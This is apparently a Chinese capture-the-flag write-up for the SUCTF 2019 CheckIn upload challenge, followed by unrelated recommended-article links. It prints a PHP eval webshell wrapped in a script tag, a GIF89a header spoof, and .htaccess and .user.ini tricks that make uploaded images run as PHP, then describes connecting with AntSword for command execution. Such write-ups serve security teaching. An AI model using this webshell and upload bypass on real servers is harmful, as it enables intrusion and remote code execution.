[SUCTF 2019]CheckIn1

提示

  1. 一句话木马的多种变式(这里需要用到用javascript来写一句话木马)
  2. 注意修改文件头

先随意上传一个文件fuzz一下看能不能直接传webshell

从下面来看常见php后缀都不行,其中有一个没有加后缀过了后缀验证这一步,到了下一步,但是他还会看文件的内容不能有<?


首先不能是php文件就上传图片文件,再通过.htaccess和.user.ini来把图片文件当php运行

既然会过滤<? , 所以到这里就应该想到

  1. 用javascript来执行php <script language='php'>eval($_POST'a');</script>

上传成功, 路径也返回出来了/uploads/c55e0cb61f7eb238df09ae30a206e5ee

接下来就要思考怎么传入.htaccess或者.user.ini了

先尝试传.htaccess

看样子因该是没有把.htaccess拉进黑名单可以传入, 但是看出来了不是图片文件(这里推断因该是会验证头信息)

这个就比较好处理, 在文件里最前面加入GIF89a他应该就会成功上传

注意, 无论什么时候content-type: 这个都是得注意的, 一般都会验证这里是否是图片类型

这里加上GIF89a尝试上传

上传成功

尝试访问上传的木马

如果不是出来的图片什么的, 就说明.htaceess起作用了, 这里用蚁剑或者菜刀之类的直接连就行了

在尝试传.user.ini

这里直接添加了文件头, 应为上面已经验证了

这里也成功上传

这里的代码意思所有的1.jpg文件都以php文件打开

所以最后两种方法都可以使用

尝试工具连接(蚁剑)

可行(记住得是上传文件的位置)

尝试rce

也是可行的

这里用的是hackbar火狐的插件

相关推荐
IpdataCloud11 小时前
跨区服玩家延迟高怎么办?用IP离线库自动分配到最近服务器
数据库·tcp/ip·github·php·ip
辣椒思密达12 小时前
AI出海产品本地化测试:住宅IP在模拟海外用户环境中的实践价值
网络协议·tcp/ip·安全·php·苹果vision pro
bitbrowser13 小时前
Claude 账号频繁被封?转向国内可直接使用的 AI 工具
开发语言·php
2501_9127840813 小时前
Laravel 多渠道代购订单聚合队列踩坑实战,解决跨平台漏单与同步
php·laravel·taocarts
2401_8541515514 小时前
嵌入式 Bootloader 与 OTA 固件升级深度解析——从 Flash 分区到安全回滚
开发语言·stm32·单片机·嵌入式硬件·安全·php
Lhappy嘻嘻1 天前
Java IO|File 文件操作 + 字节流 / 字符流完整笔记 + 递归删除文件实战
java·笔记·php
2601_963771371 天前
How to Scale Your WordPress Store Traffic in 2026
前端·php·plugin
黄华SJ520it1 天前
跨境电商分销直销系统:多语言融合的全球销售引擎
开发语言·php·系统开发
右耳朵猫AI2 天前
PHP周刊2026W28 | 安全更新、Laravel 13.18、Twig 3.28
开发语言·php·laravel
罗政2 天前
PDF 批量合并工具:本地 AI 自动排序、识别正文日期与合同编号
数据库·pdf·php